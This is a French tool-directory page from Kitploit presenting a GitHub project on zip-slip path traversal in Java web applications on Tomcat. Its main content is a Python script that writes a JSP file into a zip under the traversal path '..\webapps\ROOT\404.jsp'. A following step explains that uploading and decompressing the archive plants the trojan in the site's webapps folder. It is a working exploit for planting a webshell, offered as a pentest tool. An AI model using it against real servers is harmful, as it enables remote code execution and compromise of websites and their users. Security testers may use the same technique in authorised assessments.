Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Java-Compressed-file-security — Vulnérabilité de sécurité des fichiers compressés Java Web | Kitploit
Outils/GitHubGitHub/jas502n/java-compressed-file-security
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubjas502n/java-compressed-file-security

Java-Compressed-file-security

Vulnérabilité de sécurité des fichiers compressés Java Web

Voir le dépôt
206il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Java-Compressed-file-security Java Web - Vulnérabilité de sécurité des fichiers compressés

Environnement de test :

root@kitploit:~
Windows For Apache Tomcat/8.5.16

0x01 Création d'un fichier compressé malveillant avec traversée de répertoire

Code :

root@kitploit:~
#coding=utf-8

import zipfile  
import sys

if __name__ == "__main__":  
    try:
        with open("404.jsp", "r") as f:
            binary = f.read()
            zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
            info = zipfile.ZipInfo("test.zip")
            zipFile.writestr("..\\webapps\\ROOT\\404.jsp", binary)
            zipFile.close()
    except IOError as e:
        raise e

0x02 Téléversement du fichier, clic sur décompresser, le fichier cheval de Troie est extrait dans le répertoire webapps du site

Télécharger l’outil